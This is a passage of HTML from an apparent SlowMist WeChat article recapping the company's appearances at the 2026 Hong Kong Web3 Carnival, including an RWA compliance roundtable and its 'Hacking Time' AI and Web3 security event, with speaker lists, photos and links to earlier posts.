安全与区块链审计领域的实践经验，与嘉宾共同探讨了下一代互联网生态中信任机制的构建路径，进一步延伸了嘉年华主会场“Web3 × AI”论坛的安全视角，为 Web4.0 时代的可靠发展贡献了务实洞见。</span></span></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">同日上午，由星路、星链、复星财富控股联合 ME Group 共同主办的「链接全球，香港 RWA 基建生态研讨会暨 RWA Connect 2026 启动会」在香港中环友邦金融中心 7 楼圆满举行。本次闭门研讨会汇聚金融机构、家族办公室及技术服务商等核心决策者，围绕 RWA 基建、生态协同、合规安全体系等议题展开深入讨论，助力全球 RWA 资源链接与落地。慢雾(SlowMist) VP 孙熹受邀出席圆桌论坛，以“合规与安全：RWA 如何打造可信生态”为主题分享洞见。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021144" data-ratio="0.6658653846153846" width="602" data-type="png" data-w="832" height="400" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=ef20cf31&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLN877meKsqibh8YUPfCa9bGlNjS3R6BtdgW4Ut7CibIwTDdQRYFA2TYLo9ASyCPWdjJ7tnqpyTySU0Vb9Y4icYwKiaUuAiankqDpNE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">孙熹强调，智能合约审计不应依赖单一机构，而需多方参与者从底层设计到多角度排查共同保障项目安全。他表示，慢雾(SlowMist) 已深度扎根香港，为多个本地项目提供安全审计服务，未来愿进一步参与香港 RWA Connect 生态建设，与金融机构及行业伙伴携手构建开放、繁荣的可信 RWA 环境。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">Hacking Time：AI × Web3 安全的技术盛宴</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作为嘉年华期间最具技术深度的安全主题活动之一，慢雾(SlowMist) 于 4 月 21 日下午在蔡氏大厦 1F CAI CAFE 主办的 “Hacking Time: Security for AI &amp; Crypto, AI for Security” 圆满举行。活动吸引了众多安全研究员、开发者与 Web3 从业者，现场座无虚席、交流热烈。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021145" data-ratio="0.75" width="523" data-type="jpeg" data-w="2048" height="392" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=ed36fb65&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCIEbCt1FcvNCvcFH2jyzfnibtDH0ndCkqaJm2BJ2wYNk803suyX6iasocqriaib3FnkwxNMQSKBhR42F26RbvhD8VSCoaD4TJZ076w%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">活动由慢雾合伙人 &amp; CISO 23pds 主持，慢雾创始人 Cos 以「慢雾 AI 安全实践」为题带来开场分享，系统剖析了 AI 安全威胁从“未来风险”转向“现实问题”的转变，并介绍了以 MistAgent 为核心、结合 MistEye 与 MistTrack 等能力的 AI 安全体系建设路径。</span></span></p><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;width: 50%;vertical-align: top;align-self: stretch;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(255, 255, 255, 0);padding: 9px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.75" data-s="300,640" data-type="jpeg" data-w="1280" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/8z8bibAexaCJ5k54mtCmKGicCnpbDgBepx65dSpoOznEAHMCm5pGyHztKnVQmf6BK7Km9hjhiauJx1icFsJOQLLzKic0UpGFqg5h7JuUUQN5j8Do/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="270" data-cropsely2="405" data-imgfileid="100021183" src="https://wechat2rss.xlab.app/img-proxy/?k=4009f028&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJ5k54mtCmKGicCnpbDgBepx65dSpoOznEAHMCm5pGyHztKnVQmf6BK7Km9hjhiauJx1icFsJOQLLzKic0UpGFqg5h7JuUUQN5j8Do%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: top;align-self: stretch;flex: 100 100 0%;border-style: solid;border-width: 1px 1px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(126, 210, 246);padding: 9px;width: auto;height: auto;margin: 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_jpg/8z8bibAexaCLibj8pPLibrW5wTLjJlLKNhGuSicQlswXlKjoRphowdnIeK2tHRIsalgtQcIGfvFKf6iceGsiaHqR94tnEg7vwQKJYl1ObECWU0MGc/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="270" data-cropsely2="406" data-imgfileid="100021107" data-ratio="0.75" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=9ad5fbb8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLibj8pPLibrW5wTLjJlLKNhGuSicQlswXlKjoRphowdnIeK2tHRIsalgtQcIGfvFKf6iceGsiaHqR94tnEg7vwQKJYl1ObECWU0MGc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">随后，慢雾业务安全负责人 Thinking、慢雾合约安全审计负责人 Kong、慢雾合伙人 &amp; CPO Keywolf 等慢雾专家，分别从威胁情报闭环、AI 驱动的合约审计与攻防实践、加密货币反洗钱挑战等维度进行了深入拆解。行业嘉宾 SEEM 与 Chris Yang 也带来了 Claude Code 工程实践与 Web3 隐私保护的独特视角。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(178, 178, 178);font-weight: normal;">👇 左右滑动查看 HackingTime 更多精彩瞬间</span></span></p><div style="display: inline-block;width: 100%;vertical-align: top;overflow-x: auto;box-sizing: border-box;"><div style="overflow: hidden;width: 500%;max-width: 500% !important;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 20%;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 94%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/8z8bibAexaCLz3NJriaibINMbnX1VRkK18Dz1lNu2VTQZknuX8RA0bEMJ1alibjU1IicZVHlJ7icrbW96MuxakLELkGHwsiasrEIgdgEleB2liaL3ibA/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="543" data-cropsely2="389" data-imgfileid="100021108" data-ratio="0.75" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=c1facc71&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCLz3NJriaibINMbnX1VRkK18Dz1lNu2VTQZknuX8RA0bEMJ1alibjU1IicZVHlJ7icrbW96MuxakLELkGHwsiasrEIgdgEleB2liaL3ibA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: top;width: 20%;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 94%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.75" data-s="300,640" data-type="jpeg" data-w="1280" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_jpg/8z8bibAexaCLb61VDz0ygoUP2OBZDicJygekJOwLsH27jibfpOwjFlPOk2O0hzv73uibGtmjU5Be1k7egibzgXamnW4V7VGd5rLepr0jyPyMhve0/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="543" data-cropsely2="389" data-imgfileid="100021169" src="https://wechat2rss.xlab.app/img-proxy/?k=64c8b3c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLb61VDz0ygoUP2OBZDicJygekJOwLsH27jibfpOwjFlPOk2O0hzv73uibGtmjU5Be1k7egibzgXamnW4V7VGd5rLepr0jyPyMhve0%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: top;width: 20%;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 94%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.75" data-s="300,640" data-type="jpeg" data-w="1280" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_jpg/8z8bibAexaCJacaM5sQcGFPcpsz8fMMKPVQLpt2guiaribzfKyPkZAtzM7sYG0wfuclxzzbkRTFrLMHic1DC6lQvJjDqIv8vcbBcX30NBm5q2d0/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="543" data-cropsely2="389" data-imgfileid="100021170" src="https://wechat2rss.xlab.app/img-proxy/?k=20c6d01a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJacaM5sQcGFPcpsz8fMMKPVQLpt2guiaribzfKyPkZAtzM7sYG0wfuclxzzbkRTFrLMHic1DC6lQvJjDqIv8vcbBcX30NBm5q2d0%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: top;width: 20%;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 94%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.74921875" data-s="300,640" data-type="jpeg" data-w="1280" style="vertical-align:middle;max-width:100%;width:543px;box-sizing:border-box;height:389px;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/8z8bibAexaCL6qBbeQAibYZTDPUzZicpxukwIkOl7LRPB8iazEgBeOAdd70EniaOicPLQ8icjQDw1dXoBLR7UbYsrsBRwEau2BvDWVkebP47UTne6s/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="543" data-cropsely2="389" data-imgfileid="100021182" src="https://wechat2rss.xlab.app/img-proxy/?k=a316a4de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCL6qBbeQAibYZTDPUzZicpxukwIkOl7LRPB8iazEgBeOAdd70EniaOicPLQ8icjQDw1dXoBLR7UbYsrsBRwEau2BvDWVkebP47UTne6s%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: top;width: 20%;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 94%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.74921875" data-s="300,640" data-type="jpeg" data-w="1280" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/8z8bibAexaCKozLY432IFJzldz6lvKNjNsg1lgswg3Y5bExOVlClV07VS6zfpFrFiaialKexjEJd6ua0IXUJEpAdmRSOJfksibBOOUribmHUGxlw/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="543" data-cropsely2="389" data-imgfileid="100021110" src="https://wechat2rss.xlab.app/img-proxy/?k=7b8516dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCKozLY432IFJzldz6lvKNjNsg1lgswg3Y5bExOVlClV07VS6zfpFrFiaialKexjEJd6ua0IXUJEpAdmRSOJfksibBOOUribmHUGxlw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">最后，由慢雾香港社区负责人 Tony Tan 主持的圆桌讨论，聚焦“香港 Web3 发展：AI 和稳定币谁将成为未来关键驱动力”，与来自 RigSec、FinTax、君合律师事务所等嘉宾共同探讨了技术、合规与产业的协同路径。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021151" data-ratio="0.5625" width="602" data-type="jpeg" data-w="2048" height="339" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=536dc735&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLTL4VR54W0rQ40iax3SlMDhwxARCq39J7GSZLpURsn8Db92LRLy3tNctiaLXNElMrRDY3juwfnoYeYrS8Ne8szqHeucadAmkTsI%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">活动结束后，“慢雾夜谈”环节汇聚 30 余位来自安全研究、链上分析及合规等领域的从业者深入交流，在开放氛围中进一步促进了跨团队连接，为未来安全能力协同奠定了基础。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">整体来看，此次 Hacking Time 不仅展现了 AI × Web3 安全面临的真实挑战，也更清晰呈现了安全从单点攻防向基础设施化演进的行业趋势。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（关于本次 Hacking Time 的详细内容，可参考我们此前发布的文章：</span><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8&amp;scene=21#wechat_redirect" textvalue="Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</span></a><span textstyle="" style="font-weight: normal;">）</span></span></p><h2 dir="ltr" style="line-height:1.38;margin-top:18pt;margin-bottom:6pt;"><span style="white-space:pre-wrap;font-size:16pt;font-family:Roboto,sans-serif;color:#000000;background-color:#ffffff;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-size: 24px;">写在最后</span></span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为期四天的 2026 香港 Web3 嘉年华圆满落幕。从主会场的前沿对话，到 F07 展位的高频互动，再到 Hacking Time 与多场生态圆桌的深度探讨，慢雾(SlowMist) 全程深度参与了这场亚洲 Web3 盛会，持续输出 AI×Web3 安全、RWA 合规建设以及行业信任机制的专业洞见与实践经验。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">大会不仅展现了 Web3 在技术创新、产业协同与合规发展上的蓬勃活力，更让我们深刻认识到：安全正从单点防御走向基础设施建设，成为行业长期健康发展的核心支撑。未来，慢雾(SlowMist) 将继续以开放姿态，与全球开发者、安全研究员、行业伙伴及生态建设者携手并进，共同推动 Web3 向更安全、更透明、更可信的方向迈进。</span></span></p></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8&amp;scene=21#wechat_redirect" textvalue="Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式" data-itemshowtype="0" linktype="text" data-linktype="2">Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504741&amp;idx=1&amp;sn=73749cca984e571fbcd6cac83e515423&amp;scene=21#wechat_redirect" textvalue="专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发" data-itemshowtype="0" linktype="text" data-linktype="2">专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504729&amp;idx=1&amp;sn=aa1c7332bba7ac7bbe4f74220e2322e6&amp;scene=21#wechat_redirect" textvalue="解读｜FBI 发布《2025 年互联网犯罪报告》" data-itemshowtype="0" linktype="text" data-linktype="2">解读｜FBI 发布《2025 年互联网犯罪报告》</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504728&amp;idx=1&amp;sn=2e9d14cd251484f86669e24458daafb6&amp;scene=21#wechat_redirect" textvalue="慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504713&amp;idx=1&amp;sn=b3c6dee54d890e1751ac7bb28d28bc74&amp;scene=21#wechat_redirect" textvalue="慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 